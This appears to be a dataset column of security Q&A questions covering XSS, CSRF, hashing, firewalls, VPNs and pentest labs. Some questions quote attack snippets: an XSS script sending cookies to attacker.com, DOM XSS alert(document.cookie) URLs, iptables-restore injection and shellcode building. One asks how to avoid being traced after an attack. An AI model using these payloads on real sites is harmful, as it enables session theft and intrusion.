instruction
stringlengths
24
29.9k
I was thinking about the recent (seemingly weekly) security breaches we've seen where millions of password hashes have been leaked and I was wondering how one might secure their site against a password dump, even if a hacker found a SQL injection vulnerability. What if the user the website was using to log into the dat...
Is there any reason to worry about running tmux/wemux on a bastion host? It seems to me that it would open up vectors to have your terminal sessions hijacked by some locally exploited account on the bastion host, something that the bastion host would be less exposed to if it was only forwarding ssh sessions. Or is tha...
I'm planning to send a user's session ID as a URL parameter which will be AES encrypted. I don't think my app has any link sharing problems. Is this idea feasible? Is it safe?
Jumping from https://stackoverflow.com/questions/7016391/difference-between-system-load-and-system-loadlibrary-in-java What are the security implications of both approach ? System.loadLibrary("_name_"); Automatically searches for a library named "lib_name_.so" in $LD_LIBRARY_PATH System.load("/PATH/TO/_name_.so"); ...
I am working on a computer that I am not allowed to install new software on. It does not have secure delete software installed. Suppose I have a file (or files) that are sensitive that I'd like to delete and prevent (or make it very difficult) to recovery. If after deleting the file(s) I filled up the hard-drive with o...
I am analysing an old attack and I got a scenario which does not really make sense to me. The attacker connects to the ftp service and runs a bunch "FTP RNFR ././ attempt". This is caught by snort as alert with sid 1:1622 I do not understand why attacker does that. His next step is PWD followed by CWD (snort sid 1:167...
I have created multiple cpanel accounts using my server WHM panel. As of now each domain has separate cpanel in my server. If one of my cpanel (domain) hacked, does that mean other cpanel are hacked too?
I am a small business owner. My website was recently hacked, although no damage was done; non-sensitive data was stolen and some backdoor shells were uploaded. Since then, I have deleted the shells, fixed the vulnerability and blocked the IP address of the hacker. Can I do something to punish the hacker since I have th...
Reading about XSS and its countermeasures from http://www.xssed.com/xssinfo#Avoiding_XSS_vulnerabilities , it says (in the 2nd last paragraph of the link) that: […] support for Unicode character sets by browsers could leave an application open to XSS attacks if the HTML quoting algorithms only look for known-bad chara...
I am looking for vulnerable operating systems that are used for practicing pentests. Damn Vulnerable Linux (DVL) is not maintained anymore. Are there any other simillar OS´s to download somewhere that are runnable on VirtualBox? When I google for such operating systems, all I get are links to articles on DVL, but there...
Reading about DOM based XSS from http://www.webappsec.org/projects/articles/071105.shtml It illustrates some examples like: http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)<script>&name=Joe and http://www.vulnerable.site/attachment.cgi?id=&action=foobar#<script>alert(document.cookie...
I am trying to integrate RFC 6637 into Bouncy Castle C# which is more challenging as initially thought because both private key and public key have to be present to calculate the share secret: that those not fit into the API of bouncy castle. Anyways, Section 10 of the RFC defines a public key is to be encoded into the...
As one can find in the Disk Utility/Erase/Security Options section, there are two options for erasing disks securely - zero out 7 times or zero out 35 times. Where these numbers come from?
If some one tried force burst attack on my website, how can I block them? Ideally, I want to block an IP if I have many http/Apache requests in a second.
Trying to create a thorough understanding of XSS and CSRF, i'm clear that a type 2 xss involves an exploit that is persistent on the server. e.g. <SCRIPT type="text/javascript"> new Image().src = 'http://www.attacker.com/evil.php?cookie=' + escape(document.cookie); </SCRIPT> If the above script is a part of a post in...
In personal mode WPA2 is more secure than WPA. However, I have read that WPA Enterprise provides stronger security than WPA2 and I am unsure exactly how this is achieved.
Microsoft has implemented a new activation protection with SLIC 3.0, how does this technology work - specifically as compared to the SLIC used in Windows 7?
I'm installing service on the cloud machine and I was wondering on port vulnerabilities for my customers. My service which lives on server A (often on a customer site) needs to access server B (lives in a cloud) through port 1234. On server B there's a service running on port 1234, but customer often wants to block ac...
I have been searching frantically for a college that has a good information security program. One of the ones I came across is Wilmington Universities Computer and Network Security program. I got a little exited when I saw it. The college is very close, it's cheap, and it has the program I want. I then went to an open ...
I was using TeamViewer (a remote desktop client) to log in to a remote computer running Windows 7. While logged in, the Java updater prompted me for administrator access to run an update check. Out of habit, I pressed AltY (for "Yes") to grant the updater permission. This worked, and the updater ran. However, doesn't t...
I was Googling for a while now, and I don't seem to find what I am looking for. Imagine I have a programm running (for example some random image generator, perhaps captcha) and I have a background process with NO GUI but with Full permission running on the same machine. I want the second process to capture the location...
Ive been informed this is not safe to use in regards to sql injection: preg_replace("/[\"'%()@$.!&?_: #\/-]/","", mysql_real_escape_string($_GET['var'])); what would be the difference in the following change? mysql_real_escape_string(preg_replace("/[\"'%()@$.!&?_: #\/-]/","", $_GET['var'])); how about if no database ...
Let say I have done something harmful to some computer. I am on wifi at my hostel, so for that session I have some IP assigned. Now, since tomorrow I will connect again to wifi and get a new IP Address, how will they (FBI or anyone) trace me? I read this article, but I am not convinced. I want to know if it is really p...
I was reading wikipedia about homomorphic encryptions, and one part got me a bit confused: "The homomorphic property of various cryptosystems can be used to create secure voting systems, ..." How would you possibly use homomorphic encryption to secure the voting process? Of course, you won't be able to intercept th...
I'm trying to find a suitable (or easily modifiable) web GUI for snort + modsecurity logs. As far as I know, Splunk can do that by installing the snort and modsecurity plugins. Is there any other option? It does not have to be ready at the get go, I'm fine with a little modification here and there.
Following my answer. If I can list contents of a password-protected ZIP file, check the file types of each stored file and even replace it with another one, without actually knowing the password, then should ZIP files be still treated as secure? This is completely insecure in terms of social engineering / influence etc...
Suppose, I have 1 disk partition (previously filled with random data) and create some file system on it (NTFS, FAT, EXT2, etc). I am going to keep some files here (i.e. visible files). Then i create a few loobpack devices with different offsets and make some file systems on them. The question is: can an observer dete...
Some Flash developers are afraid of JavaScript. Their point of view: Stealing JS source code is effortless, one would just 'view source' and copy it. Yes, you can decompile Flash bytecode, however it requires more time and knowledge. As a result, JavaScript is not suitable for commercial software development, because c...
Suppose I use KeePassX as a password manager, and I store the kdb file in Sparkleshare folder as a way for backing up and syncing with multiple devices. The kdb file in itself would be encrypted, but if someone stole the git repo, they technically would have many versions of the same file with minor variations. Would t...
I set up Apache2 with SSL and tried to request the default Apache2 web page ("It works!") using https://[IP_ADDRESS]. The Chrome developer tool shows that only one HTTP connection is established, however, from Wireshark's captured packets, there are three separate TCP streams. The first two TCP stream finish the SSL ro...
I'm trying to a cascading cipher encryption algorithm to encrypt a textfile via mcrypt. I'm essentially trying to emulate the behavior of TrueCrypt, where it can cascade two or three different cipher algorithms when encryption data. From this website I see that cascading encryption algorithms are a feature of mcrypt. ...
A user reported having a virus that was causing pop up windows asking for money. When he turned on his laptop and logged into PGP encryption (whole disk) the desktop quickly showed but then a white screen covers everything. Sometimes there's random characters in the upper right cornor of the white screen. Since we can...
I have been receiving threatening emails from someone, and I don't want them to know my location for my safety's sake, but I need to send them a "Cease and Desist" notice. This person has great resources, both technical and financial, and I just wish to be left alone. What are my options?
As far as I understand, WiFi networks that require no password send traffic through the air unencrypted. Those that require a password encrypt each connection uniquely, even if they're all using the same password. If this is true, I don't understand why. Requiring a password for access and encrypting connections seem l...
Does the IPSec protocol suite use IKE or ISAKMP? RFC 2828 states ISAKMP is the protocol used in IPSec to handle SAs, key management and system authentication. Other sources say IKE is the protocol that used. From RFC 2828: $ Internet Security Association and Key Management Protocol (ISAKMP) (I) An Internet IPsec proto...
To protect against CSRF, couldn't my page javascript just dynamically insert the session id from the cookie into the body of each HTTP request right before it's sent? The server would then just validate that (value received from cookie) == (value from request body)...
So our website was hacked, and these are the things that were done: Some entries in the database were changed. I don't know if this was via SQL injection, or direct database access (only root is allowed to make database changes, is it possible to emulate root or obtain its password?) or through the CMS of the website....
I am aware of the benefits of adding a salt to values that are hashed using a one-way function. Is adding a salt to a value that is being encrypted (using symmetric encryption) considered to be good practice as well? The salt (unlike the encryption key) is likely to be stored in the same data source as the encrypted da...
Most modern (and tablet-oriented) operating systems now offer alternative ways of logging on other than a strong password. For example, iPhones offer a 4-digit PIN, Android devices offer this and a 'Pattern Lock', and Windows 8 devices offer the 'Picture Lock' in addition. Obviously, these passwords are not terribly se...
I want to know why calling a database from the front end is considered a bad practice for security. It is really so bad as to justify building an application layer with all its drawbacks: costs, performance, development time?
I have an ASA-5510, but I also intend to maintain strict IP tables on my server (Ubuntu 12.04.2), so that there are two layers of "protection". My iptables look like this: *filter # Allows all loopback (lo0) traffic and drop all traffic to 127/8 that doesn't use lo0 -A INPUT -i lo -j ACCEPT -A INPUT ! -i lo -d 127.0....
I'm wondering if there is a source available which has a list of CVE numbers and shows whether they have been patched or not (and maybe a link to a relevant patch). I know Secunia has something like this but I was wondering if there any others.
Consider the all lowercase passphrase: "lazy fox haggles treaty" Assume all four words are in a dictionary of 2000. Bruteforcing word combinations, how long does it take to crack this password at 1000/s? How does this change if there are upper/lowercase? How does this change if there is a dictionary of 10000 words? Edi...
I'm currently dealing with a "Sniffy" java application. Well I can see it connecting to some kind of server using HTTPS. I would like to see what its sending or getting over HTTPS. i have read some stuff about decoding HTTPS but the problem is I dont have there private SSL Certificate. I was thinking, is it possible to...
I've been searching for a couple days, even contacting support, to find out if Nessus has a bundle that scans for PCI compliance. It selects all 44 categories and regardless of what kind of scan I create (under policies) this is the default selection. Because this is the HTML5 version there seems to be very little docu...
I'm new to CSRF attacks but don't see how they are always blind. Let's say we are dealing with a site where the asset we need to protect is the HTTP response. Something like one's medical history. According to what I've read one shouldn't need to protect GET requests even though the response to these requests may conta...
I want to setup a testing lab in my basement for penetration/vulnerability testing & offensive/defensive security skills. I believe I have all the equipment that I need, and if I'll need something else, I will get it. I also have Cisco routers, firewalls, and managed switches. Money and resources are not an issue. How ...
My company makes a JavaScript widget that e-commerce sites can embed on their pages. Our current instructions to our customers tell them to load our JS on every page of their site and most follow this advice to the letter, even including it on their pages with credit card forms. I have been petitioning for us to change...
There are posts that says php mimetype isn't secure, or can be bypassed. How do people spoof the mimetype?
I often come across sites that have way to many comments included in their source code, sometimes these comments offer valuable insight into whats happening in the code, the logic of functions, unused (but still present) 'features' and sometimes even vulnerabilties are documented in comments. Given the wealth of infor...
What's the common way to block users from accessing intranet? Right now, whoever plugs in a cable can access any intranet server freely. I want to change this behavior. But given that we run not only Windows machines but also Linux clients, I can't just use NAP to restrict DHCP access. Here's my thoughts: Perhaps all ...
I need to sync with my server with the client certificate abc.pfx which is generated by the server using Ajax. How do I send my certificate with Ajax object. Can I do this certificate authentication with JavaScript?
Last night my website got hacked and attacker edited the main index.php. I was wondering even he edited that file, the last modified date did not change. so I just worry if he would put the backdoor codes in other files. It is difficult for me to know the last edited files. Is there a way I can know last edited file...
In the following nmap output: $ sudo nmap -sS -sV -vv -n -Pn -T5 x.x.x.1-255 -p80,23,21 -oG - | grep 'open' Host: x.x.x.x () Ports: 21/closed/tcp//ftp///, 23/open/tcp//telnet?///, 80/filtered/tcp//http/// Host: x.x.x.x () Ports: 21/open/tcp//ftp//D-Link or USRobotics ADSL router firmware update ftpd/, 23/open/tcp//t...
Usually I write assembly programs and then dump their contents to get the shellcode. What I was wondering is whether I could write a C++ program instead of assembly, then dump and use that instead of the assembly?
I am thinking about the design for a sandbox, which is able to execute arbitrary unmodified, untrusted binaries. The goal is to implement an application Unlike something like e.g. Google Chrome's sandbox it has to provide additional isolation that the security mechanisms baked into Windows can not provide. However, it...
Today I have received 3 emails to my three different addresses, one with Google, one with MSN, and one with my company. All emails were sent from password+kjdmiikvhppi at facebookmail.com email address. Content are same, as if I had requested a password change. I have never requested for such a thing, and more strangel...
I posted a question here... Protecting Password Hashes with Store Procedures? ...where I asked about denying a website's database user CRUD access to the tables that store password hashes except through stored procedures which only check equality, and don't return the hashes. This would seem to make it impossible to du...
I am looking at how to secure a web site against getting its session cookie stolen. These are the controls that I know are widely known/used: HTTPS Everywhere Only use a securely created random string for the cookie value Mark the session cookie Secure and HttpOnly Change the session cookie on login I am debating usi...
In our university users have to use VPN to connect to internet.But for local works(like login to university website,checking their university accounts) VPN is not needed.And as I know we have unencrypted wireless LAN connection which is not secure at all. As a computer student, to show these problems I want to get some...
There are some emails with links to people's cracked websites with a malware download Like this kind of email: fake DHL pack station email ... the links often take the form of: http:// www.mandyhank.com /sbfdiqr.php?get_info=ss00_323 http:// sasfamily.com /fpxlcaj.php?get_info=ss00_323 http:// tfdesignsandpcrepair.com ...
I'm new to w3af, and I would like to build my own plugin. I have searched on w3af web and googled it for some examples but no luck... Can anyone give me an example how to start building plugins or where to look? Thanks in advance!
If I receive an email with a plain text generated password (in response to a password reset request), is this a vulnerability? The password expires after one use, in other words the user has to change their password as soon as they register. I could imagine that such an password reset scheme would at least be vulnerabl...
I use vim and have a use case for modelines. A modeline means that vim will parse a textfile for lines like: # vim: set someoption=somevalue and will then set those options. This is awesome if I'm the person writing the modelines, but it also might break down the assumption that I can open untrusted text files with ...
I have a ksh script (Korn Shell Script) that generates a static HTML file from websites. How can I ensure that the output HTML file will not contain any bad <script>'s (bad JavaScript)? It's OK to do this: sed 's/<script>//g' But what if the <script> is obfuscated?
I have a situation where my employer has a support contract with a vendor for an application we use. This application runs on a (Windows 2008 R2) server that does not store or have access to any information that I would consider to be business confidential or requiring strict security such as credit card, PII, or healt...
After eating some garlic bread at a friend's who is not security-aware, she managed to quickly determine the PIN code to unlock the screen of my Samsung SIII. She figured this out by simply holding the device against the light and looking at the grease pattern my thumb left on the screen. It only took her 2 attempts to...
I'm trying to understand how typical Linux distributions generate the password field for entries in /etc/shadow. I can't figure out what encryption algorithm is being used to produce the encrypted password string. For example: $1$CQoPk7Zh$370xDLmeGD9m4aF/ciIlC. From what I understand, the first value 1 signifies that ...
How often should encryption keys be backed up? Should this be done on the same schedule as the encrypted content/configuration? That seems excessive, as the keys do not change as often. Perhaps only once, every time the key changes? That sounds dangerous... and I'm not sure it won't leak some cryptoinformation.
(Judging by voting and answers, I failed rather badly at asking a question that in my head was superbly clear. Clearly I was wrong. I've since attempted to rephrase the original question to more precisely reflect my original thought, and now with the help of two good answers to a terrible question!) Question: Have anyo...
I am looking for some good reference material (books, blogs, names, etc..) regarding Mobile Device Security. I am specifically interested in Corporate Mobile Device Management (MDM) where often companies have to deal with BYO devices. Who are the topdogs on this topic?
I was doing some testing on a server to see if it was vulnerable to a 0-day local exploit (the exploit was for gaining root privileges using a bug in the Linux kernel). There was no real information yet on how to know if your vulnerable or not except by running the exploit. Which I did and ended up getting a heap of tr...
Background: WorkerB and Tymac were discussing the pros-and-cons of using two different alternatives for extending a web content management system that is used in their company. Alternative one allows a developer to extend the CMS using home-grown PHP files that conform to the API of the CMS. Alternative two allows a d...
I saw that the leader connected to IRC without using TOR and they traced their IP address, but the identity of each member was supposed to be unknown to the others. So even if the leader was acting as an informant, how did the other people get caught? http://americablog.com/2012/03/how-the-fbi-caught-lulzsec-hacker-sab...
When I visit YouTube, my browser accesses the website and begins to play whatever video I select. By its very nature, this involves YouTube sending the content of the video to my computer. Not only this, but my computer clearly caches the audio/video information which is being sent, as demonstrated by the fact that I...
Does anyone know how the AppEngine sandbox is implemented? I heard they use a SecurityManager with Java but surely they are using another layer as well like LXC. I've looked at the whitelist and there are a lot of classes that: commonly used in exploit chains because they have security flaws that Oracle refuse to fix...
Most people are aware there are two types of RFID tags, active tags (ones that contain a power source of some kind) and passive tags (ones that are powered by the RF field). I'd like to know if choosing one type or the other provides a security advantage? Does the ability to power passive tags only via RF field mean t...
I would like to ask if it is possible to use different CA for the client certificate and the web certificate? For example, I would use Verisign to sign my web certificate while I use my Self Sign certificate for the client certificate. I am just concerned that I need to pay a CA for each new client certificate that I w...
It's a well known fact that anyone with "SA" privs can turn on xp_CmdShell and use it and that includes any would-be attackers that can gain access to SQL Server as a login that has "SA" privs. There are some very good best practices to help prevent an attacker from "getting in as 'SA'" including disabling the "SA" lo...
I would like to know what makes up a TGT ticket? The reason is that we've noticed the more Windows AD groups the account is in, the larger the size of the ticket. We've also noticed that when we clear Internet Explorer cookies, the ticket size drops (ever so slightly). Brief example: If the account is in 543 AD groups,...
How do we know that the systems that we are using are secure? At what point do we have to audit the software that we use? How do unknown security threats affect software over time?
I have some scripts on Ubuntu Linux machine that logs in to a database server to run some maintenance daily. To login to the database, I need a password and right now it is hard-coded in the script. What are better ways to run this script without hard-coding/exposing the password?
Is there a way to install Metasploit under Cygwin? Metasploit is meant to be run under a linux environment. The Windows installation doesn't have many tools such as msfpayload available. Please contribute with an answer, not alternative methods.
I have some Array Load Balance device that the user password hash like: user "array" "XXXXXXXXXVkjTX9a1kYtNo". How can I crack the password or find out the algorithm of the hash?
I am doing black box testing on a software which is installed in my local machine. I want to analyze and see the list of files and registry entries that software create/modify/delete. Basically analyze a software for the files which software deals with. is there any software available to do this? Am using Windows machi...
As part of my current project we will be deploying smart card readers containing SAM cards for decryption purposes. The deployment process involves a third party software integrator who will control the readers. Our manufacturer can provide these cards with a PIN enabled or set to a predefined value. What are the recom...
Usually the server specifies in the Server Hello message if a client certificate is needed/wanted. Does anybody know if it is possible to perform an authentication via client cert if the server does not request it? And if it possible does anybody know a client that allows to force a client certificate authentication?
I'm using Debian's arno-iptables-firewall and I've configured it to only allow access on the ports I need. But nmap shows ports 1863, 5190 open. What gives? How can I interrogate those ports further? As I said, I'm actually using arno-iptables-firewall, but as that is difficult to 'debug' (it is very complex), I'm prov...
During a pentest I found a way to add arbitrary iptables firewall rules to a server. These rules get applied by way of the iptables-restore command, and I've been wondering whether there is any way to execute commands by manipulating the input. My starting point is the following, which will output the help for iptables...
From what I understand Key Escrow is where a copy of they key is stored in a safe place so they can be recovered later. But in the context of PKI, a Recovery Agent can also recover private keys. How are they different? Does a Recovery Agent use a Key Escrow?
I am working on a scenario if we have two or more web application hosted on a same server. Let says Web application X is vulnerable so how can i be sure that it will not effect the other web application Y. In short my question how can I isolate web application hosted on the same server ? What are the techniques that ne...
Background: My current server-provider tells me it's no problem to store the passwords in plain-text in the database, saying he has to do so because they use CRAM-MD5 for email authentication. My brain disagrees. But something tells me that storing passwords in a database in plain text format might not be the only secu...
Being a memory intensive hash, I was wondering if SSD's offer any appreciable performance boost for brute force attacks.
Is it possible to change the 'Key Usage' property of an existing ssl certificate of a web site? Our goal is to host a web service so that a third party can integrate with our solution, and their requirement is that our ssl certificate has 'Data Encipherment' in the 'Key usage' field. Currently our ssl for the site does...
I mean if the attacker tries to ask all the open DNS resolver respond to a web server. The web server can just block its UDP ports. If the all the DNS response go to a Authoritative Nameserver(victim), it can just drop all DNS response. Or is DNS Amplification all about bandwidth?
This question has been bothering me ever since I first heard of ATM skimmers: Instances of skimming have been reported where the perpetrator has put a device over the card slot* of an ATM (automated teller machine), which reads the magnetic strip as the user unknowingly passes their card through it. These devic...
I have developed an MVC web app. Right now, the client using this app in office area. The client has requested that no one should use this app on any device except the office's PC/tablets. Now problem is, it's a web app, so how can I put restrictions that nobody can use this app from the outside of the office or with d...
To protect yourself against XSRF, you need to have a separate token on a page. See: Coding Horror: Preventing CSRF and XSRF Attacks, by Jeff Atwood As the posting suggests, its best to have those tokens in a hidden field inside your form. But I wonder, if there is any benefit in storing them in an anonymous function in...
I need to provide store's clients with a tool to check the status of their repair orders. The clients doesn't have a user or password. They are only a record in the database. Yet I need to give them a way to login to the webpage and check their status (ready or not). Forcing then to register is not an option. I came ...
Many companies use HTTP cookies, flash cookies, and other analytics to track visitors on the web and classify them. How can I find out what my web profile is currently, and what these trackers are currently classifying me? I understand there is not one canonical profile as different sites may have access to different d...